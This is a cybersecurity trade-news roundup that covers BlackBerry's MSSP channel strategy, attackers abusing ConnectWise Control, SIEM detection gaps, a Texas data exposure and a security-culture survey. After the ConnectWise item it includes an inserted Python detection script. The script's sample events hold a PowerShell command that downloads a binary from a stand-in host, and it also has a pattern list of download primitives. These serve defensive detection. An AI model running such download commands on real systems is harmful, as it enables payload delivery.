The Gately Report: BlackBerry Ups Investment, Support of MSSP Partners
Meantime, Blackpoint Cyber detects threat actors deploying attacks with ConnectWise Control.
Channel Futures: Last month, BlackBerry reported its third consecutive quarter of sequential cybersecurity billings growth. What role did partners play in this growth?
Colleen McMillan: Our partners have been doing a pretty great job. We’ve had some really good growth areas, especially around the MSSP arena, where we’re seeing more and more customers looking for a managed service offering. They’re trying to have a simplified approach to cybersecurity and having someone help them with that, where they provide that managed service offering 24/7/365. So we did have some really solid growth in the MSSP space, which is all partner driven, as you can imagine. And our top MSSPs, some of them have just grown significantly, 70% to 80%. But if you’re to look at maybe the top 50, they’re experiencing 30%-plus growth. So really seeing that simplified type solution without sacrificing the security protection.
They can still rely on the AI-driven protection solution and then the partners can add in their managed service offering around that. That is where we’ve seen some incredible growth. And we’re still seeing 85%-plus maybe a point or two of partner interaction with our billings. And BlackBerry is very partner friendly and working to continue to grow the billings through that.
CF: How is BlackBerry helping its customers attract new customers?
CM: We have a program called Protect & Earn to help incentivize partners to go after net new [customers]. And we’ve seen tremendous growth there where our partners are rewarded favorably to go after net new [customers]. So we did pretty well with 300-plus new [customers] last year. That wasn’t for the whole year. That was from the inception of the program. So we’re seeing tremendous value there and expanding our reach to more customers.
CF: BlackBerry has reported that MSPs are a viable target, particularly for ransomware attacks, due to their level of access to multiple customer networks and sensitive data. How can BlackBerry and its partners help MSPs stay safe?
CM: So obviously having access to our full suite of products — Protect, Optics, Gateway — and we’re also helping them with offering Guard, which is a managed service offering that they can offer to their customers as well. And the better we partner with them in terms of enablement, alignment in the field, having access to our technical engineers, all of that, we want to make sure that they’re offering not only the best security products, which is based on our AI-driven protection solutions, but also that they’re able to provide the services that customers need.
CF: BlackBerry recently released its 2022 Threat Report, which revealed that malicious hacking attempts occur every 39 seconds, with SMEs facing upward of 11 cyber threats per device per day. Is there a message for partners in this report?
CM: I think the message is that it’s a dynamic environment. Customers are really challenged. And I’ve been at this 30-plus years working with customers and working in the IT space. And there’s never been a better opportunity to be in the partner community because customers need their help. Because it’s gotten so complex, it’s accelerating and so dynamic, it’s not a situation where it’s a nice to have.
So if partners are investing in cybersecurity in terms of skill set and partnerships, that’s going to have a pretty tremendous payoff because customers absolutely need their help. They cannot keep up with the changing demands. Everything’s being accelerated as they move to the cloud and migrate data over the whole proliferation of devices. We all have more and more devices. You have IoT as well, where everything’s online. That’s great because it shares information and it can do some really cool things, but it also offers an opportunity for access points where bad actors can take advantage of that. So it’s really a pretty compelling time for a customer to look to the partner community to help provide a simplified solution, not in terms of the technology or anything, but in terms of them being able to consume it. So it’s having a simplified solution where the partner … helps them cut through the noise and it offers a combination of products and managed service offerings in different ways that a consumer might want to buy.
CF: How would you describe BlackBerry’s global channel strategy? Is it evolving? Are changes taking place?
CM: I was brought in initially to really complete that whole unification of Cylance and legacy BlackBerry enterprise programs, take the two programs, put them together so that we make it easier both for BlackBerry partners, as well as Cylance partners. Now we’re one team, one channel, and we want to create that single, comprehensive global program where we’re investing in the partner. So I’ve been on board about 18 months now, and it’s really been so favorably received because when I first came in, we did a lot of surveys and I spent time working with the partners, hearing direct feedback, and it was great to hear the good and the bad. And so I’ve really been able to take that feedback and invest in the channel. I’ve added to the channel team. In terms of some new channel leadership, I’ve worked really closely to build closer alignment with the field sellers so that we are very channel friendly. We’ve invested in improving sales operations because obviously anytime you merge two programs together, two companies together, that’s an area where you can make it easier to work with. And partners really put a high value on being easier to work with.
We’ve made investments in MDF, not only the amount of MDF, but in the process of getting MDF. We’ve done some joint demand generation with BlackBerry Crush Days, which has been really favorably received. We’ve improved the partner enablement and access to portals. We’ve put things in multiple languages. So it’s all about creating this smooth transition so that the partner can really rely on us not only to be there, but support them in the best manner possible.
CF: What are partners’ most pressing needs when it comes to cybersecurity?
CM: To serve their customers, they need support. They need, obviously, access to information so that they can stay current and relevant, and that goes back to the concept of things are constantly changing very, very quickly. Everything’s accelerating. So how can we give them the right information at the right period of time. So when things come out from these ransomware attacks and these high-profile breaches, how can we respond with them or provide them the information quicker so they can respond to their customers to help protect them. So it’s all about staying in front of it, being there for them, supporting them with enablement, supporting them with briefings, and really being the experts because they are using our products and we are the experts on that.
I don’t think I can say there’s only one or two or maybe the top three things they need, because part of it depends on where they are in the lifecycle of the sale. But I see it as our job to make the customer successful in fighting off these cyberattacks. And to do that, we have to make our partners successful because if they’re successful in meeting the needs of the customer, we’ll ultimately be successful.
CF: What are your goals for BlackBerry’s channel for the remainder of 2022?
CM: The goals are around supporting customers in whichever way they decide to consume technology. I learned early on that different customers have different needs in how they consume their technology. Some might want to host it in cloud and some might want on-premises. So as customers really change the way they’re buying or consuming technology, we’re seeing a tremendous shift with the SMB and the midmarket because of the complexity of cybersecurity. And so how can we be responsive to supporting those partners that are going after that marketplace with subscription-based solutions and where it’s managed services, to then the classic enterprise that still wants to purchase in a resale motion.
We’re also seeing tremendous growth in OEM. So there’s a lot of customers that want to embed the technology and then they go sell their products. So they have to be supported differently. So I think the biggest challenge is always having your customer central to everything and then trying to go to market such that you support all partner types. It doesn’t matter what partner type it is. If they are touching the customer, we want to make sure we support them in the way that the customer wants to consume the technology.
In other cybersecurity news …
Threat actors have been using ConnectWise Control, MSP remote control software, to launch cyberattacks.
That’s according to Blackpoint Cyber. It described the methods of attack in a blog.
Jeff Bishop is ConnectWise’s chief product officer.
“We hate to see any software products used for malicious purposes, but unfortunately, remote control tools are used for this purpose all too frequently,” he said. “ConnectWise works diligently to prevent the misuse of our products through online training and educational material, and by implementing AI and machine learning to detect malicious actors that may be using Control to ‘scam’ end users.”
Designed to offer help desk-style services, ConnectWise Control, also known as ScreenConnect, allows for full remote control of an endpoint, Blackpoint said.
“ScreenConnect has two main features appealing to threat actors,” it said. “The first is known as ‘backstage mode’ which allows for complete access to the Windows terminal and PowerShell without the logged-on user being aware. This is the primary use case observed by Blackpoint. The second is a mass-deployment feature for the agent based on the subnet or address resolution protocol (ARP) table. While this is a similar feature to Total Software Deployment (TSD), this tool allows for another avenue of lateral movement. Blackpoint has yet to see attackers use this feature in earnest.”
“When access is obtained, Control is then able to issue further commands such as running PowerShell commands to download malicious payloads or ensure persistence using Registry Editor (regedit). Fortunately, in all examined cases where devices were monitored, Blackpoint was able to prevent any such capabilities from being run.”
Control is available for a monthly cost of around $30, Blackpoint said.
“Unfortunately, threat actors are circumventing this cost by exploiting freely offered trials of the software,” it said. “ScreenConnect only requires the user to provide an email address, password and the name of their preferred ScreenConnect URL. Sadly, there are no measures in place to easily identify when threat actors are using trial versions of software. Nevertheless, the capabilities employed by these actors can still be identified and remediated.”
When these attacks are detected or reported, ConnectWise works with the appropriate authorities to assist them in taking action against these malicious actors, Bishop said.
“If a company or individual believes that ConnectWise Control was used in an exploit or their instance has been exploited, we encourage them to report the details of the activity on this page,” he said.
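An added detection sketch for the behaviour Blackpoint describes (not code from Blackpoint, ConnectWise or this article): it flags process-creation events in which a ScreenConnect client binary launches PowerShell, cmd or a registry tool, and surfaces events whose parent field was never extracted instead of silently passing them. The Sysmon-style field names, the `ScreenConnect.*` binary-name match and every sample event are assumptions constructed for illustration.

```python
import ntpath
import re

# Child processes of interest when spawned by a remote-control agent.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
REGISTRY_TOOLS = {"regedit.exe", "reg.exe"}

# Common PowerShell download primitives (payload retrieval, per the article).
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|"
    r"start-bitstransfer|net\.webclient",
    re.IGNORECASE,
)

# Assumed install path; the hexadecimal instance id is a placeholder.
SC = (r"C:\Program Files (x86)\ScreenConnect Client (0000000000000000)"
      r"\ScreenConnect.ClientService.exe")

# Constructed events: hosts, users and command lines are made up.
SAMPLE_EVENTS = [
    {"Computer": "WS-014", "ParentImage": SC,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -NoProfile -Command "Invoke-WebRequest '
                    r'-Uri http://files.example.invalid/a.bin '
                    r'-OutFile C:\Users\Public\a.bin"'},
    {"Computer": "WS-014", "ParentImage": SC,
     "Image": r"C:\Windows\regedit.exe",
     "CommandLine": r"regedit.exe /s C:\Users\Public\run.reg"},
    {"Computer": "HELPDESK-02", "ParentImage": SC,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c ipconfig /all"},
    {"Computer": "WS-020", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem"},
    # Parent field missing: the log source did not deliver what the rule needs.
    {"Computer": "SRV-003",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
]


def classify(event):
    """Return a finding category for one event, or None if not relevant."""
    parent = event.get("ParentImage")
    image = event.get("Image")
    if not parent or not image:
        # A rule that cannot see its key fields is broken, not clean.
        return "unparsed"
    if not ntpath.basename(parent).lower().startswith("screenconnect."):
        return None
    child = ntpath.basename(image).lower()
    if child in SHELLS:
        cmdline = event.get("CommandLine", "")
        return "download" if DOWNLOAD_RE.search(cmdline) else "shell"
    if child in REGISTRY_TOOLS:
        return "registry-edit"
    return None


def triage(events):
    """Return (host, category) pairs for every event worth an analyst's look."""
    findings = []
    for event in events:
        category = classify(event)
        if category is not None:
            findings.append((event.get("Computer", "unknown"), category))
    return findings


if __name__ == "__main__":
    for host, category in triage(SAMPLE_EVENTS):
        print(f"{host}: {category}")
```

On hosts managed through a sanctioned ScreenConnect instance the plain `shell` category will include normal help desk work, so it is best treated as context and the `download` and `registry-edit` categories as the alerts.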
New CardinalOps research shows security information and event management (SIEM) solutions aren’t detecting 80% of MITRE ATT&CK adversary techniques.
MITRE ATT&CK is the industry-standard catalog of common adversary behaviors based on real-world observations. The analysis shows actual detection coverage remains far below what most organizations expect. Moreover, many organizations are unaware of the gap between their assumed theoretical security and the defenses they actually have in place.
The data set for this analysis spanned diverse SIEM solutions encompassing more than 14,000 log sources, thousands of detection rules, and hundreds of log source types. They also spanned diverse industry verticals including financial services, manufacturing, telecommunications, and MSSP/MDR service providers.
Using MITRE ATT&CK as the baseline, CardinalOps found that, on average:
- Enterprise SIEMs contain detections for fewer than five of the top 14 ATT&CK techniques employed by adversaries in the wild.
- SIEMs are missing detections for 80% of the complete list of 190-plus ATT&CK techniques.
- Fifteen percent of SIEM rules are broken. That’s primarily due to fields that are not extracted correctly or log sources that are not sending the required data.
- Seventy-five percent of organizations that forward identity logs such as Active Directory and Okta to their SIEM do not use them. That’s concerning because identity monitoring is one of the most critical data sources for strengthening zero trust.
- Seventy-five percent of out-of-the-box detection content provided by SIEM vendors is disabled due to noisiness and customization challenges experienced by detection engineering teams.
These major gaps in detection coverage can be attributed to a number of challenges faced by security operations centers (SOCs) and their detection engineering teams. At the top of the list is constant change in the threat landscape, organizational attack surfaces, and business priorities, combined with increasing complexity resulting from an ever-increasing number of log source types and telemetry from diverse data sources.
Difficulty in recruiting and retaining skilled security personnel is also a major factor. And many enterprises are still relying on manual and error-prone processes for developing new detections, which makes it difficult for engineering teams to scale effectively and reduce their backlogs, according to CardinalOps.
Michael Mumcuoglu is CardinalOps’ CEO and co-founder.
“Our goal with creating this report was not to shame security teams for having blind spots, but rather to draw management-level attention to the disparity between perceived security and actual detection quality and coverage, using MITRE ATT&CK as the benchmark,” he said. “If we’re spending all this time and money on more security tools, why are we still being hacked? We believe the answer lies in the need to apply automation and analytics to identify and fix misconfigurations in existing tools, as well as remediate the riskiest detection gaps, in order to free detection engineers to focus on more strategic activities such as investigating new and novel attack scenarios.”
Confidential personal data of 1.8 million Texans was exposed and available to the public for almost three years. The data was from Texans who filed workers’ compensation claims with the Texas Department of Insurance.
That’s according to CNET. The information includes names, Social Security numbers, addresses, phone numbers and dates of birth. It was publicly available online from March 2019 until January 2022.
According to a state audit report, the issue was caused by programming code that allowed internet access to a protected area of the application.
“The department is offering 12 months of credit monitoring and identity protection services at no cost to those who may have been affected by the issue,” it said.
Neil Jones is director of cybersecurity evangelism at Egnyte.
“The recent data breach at the Texas Department of Insurance is especially concerning because workers’ compensation data inherently includes personally identifiable information (PII) and protected health information (PHI), which are potential treasure troves for cyberattackers,” he said. “Although there’s no current evidence that the breached information has been used maliciously, it is not uncommon for attackers to wait for just the right time to post their breached data to the dark web. There are several key lessons that can be learned from this incident. Organizations need to combine data security with effective application security testing and penetration testing programs. Stress testing needs to be conducted before an application’s brought live to end-users in a public setting. During these dynamic times, routine technological audits need to occur on a more frequent basis than they did before, to prevent vulnerabilities from being exploited.”
Security culture, a workforce’s shared attitudes, perceptions and beliefs towards cybersecurity, has improved globally, according to KnowBe4 research.
The 2022 KnowBe4 Security Culture Report looked at the seven different dimensions of security culture across regions and industries worldwide. Those include attitudes, behaviors, cognition, communication, compliance, norms and responsibilities.
The report includes responses from more than 257,000 employees in 1,456 organizations globally who are also KnowBe4 customers and have completed the security culture survey.
Key findings include:
- In the United States, differences in security culture exist based on organizational size, where small organizations are outperforming larger ones.
- In Africa, there is a tradition and interest in security culture, especially in South Africa, where a higher level of security culture was achieved.
- In Asia, a wide variation of security culture scores across nations exists. While Japan is doing reasonably well, countries like Malaysia and Indonesia show an alarmingly low security culture index score.
- In Europe, both Sweden and Ireland are often considered as technologically advanced. Along with these two countries, Italy and Bulgaria also had higher security culture scores.
- Security culture in Oceania is showing that Australia and New Zealand are quite different from each other, and neither is doing particularly well.
- Central and South America are now beginning to measure security culture, with more countries from these regions added every year.
Roger Grimes is data-driven defense evangelist at KnowBe4.
“We have not finished analyzing all the data yet, but in general, any smaller group of people is easier to control than a larger group of people,” he said. “Larger groups of people have a wider initial viewpoint, different experiences and different biases. Smaller groups, where you have a higher percentage of direct individual friendships and relationships, can make sharing a culture easier.”
Everyone, large or small, is invested in reversing the trend once they understand the issue, Grimes said. It’s also a matter of maturity, regardless of size. It takes time to realize there is a big, common problem like social engineering and phishing attacks or just general insecurity.
Ransomware and other cyberattacks making big headlines helps raise awareness, he said.
“The doubling of cybersecurity insurance and all the things cyber insurers require is another big stimulant,” Grimes said. “On top of that, the U.S. president routinely talks about it on national television as well as an incredibly timely and valuable government agency, the Cybersecurity and Infrastructure Security Agency (CISA). So, it really is a whole country effort, from individuals to national government agencies all trying to help change the culture. Sometimes it only takes a village, and sometimes it takes a nation and national culture change. We are all in on that concept.”
BlackBerry is accelerating its work with MSSP partners as the managed security services marketplace is expected to skyrocket through 2030.
That’s according to Colleen McMillan, BlackBerry’s vice president of global channel sales. She leads the company’s global channel strategy.
The managed security services marketplace should grow from about $22 billion to over $77 billion from 2020 to 2030. That’s good news for BlackBerry MSSP partners.
“That’s a pretty good indicator that we’re going to see more and more growth around the managed service marketplace,” McMillan said. “So obviously we’re making tremendous investments there to support our MSSPs. We’ve doubled the team.”
Augmenting BlackBerry’s Cybersecurity Team
Last fall, John Giamatteo, formerly McAfee’s president and chief revenue officer, became president of BlackBerry’s cybersecurity business unit.
“He’s really done a fabulous job of bringing on a number of key individuals that have tremendous cybersecurity experience,” McMillan said. “We have a new vice president to head up research and threat intelligence and we have a new CTO. So there’s a lot of really solid cybersecurity credentialed folks that are at the helm making a difference. I think it’s exciting for our partners. And I’m just very optimistic about being here at this moment.”
For its fourth-quarter 2022 earnings, BlackBerry reported total company revenue of $185 million. Cybersecurity revenue totaled $122 million.
Cylance, which BlackBerry acquired in 2019, has been rebranded to BlackBerry Security. BlackBerry added Cylance artificial intelligence (AI) technology to its portfolio of cybersecurity innovations.
Want to contact the author directly about this story? Have ideas for a follow-up article? Email Edward Gately or connect with him on LinkedIn.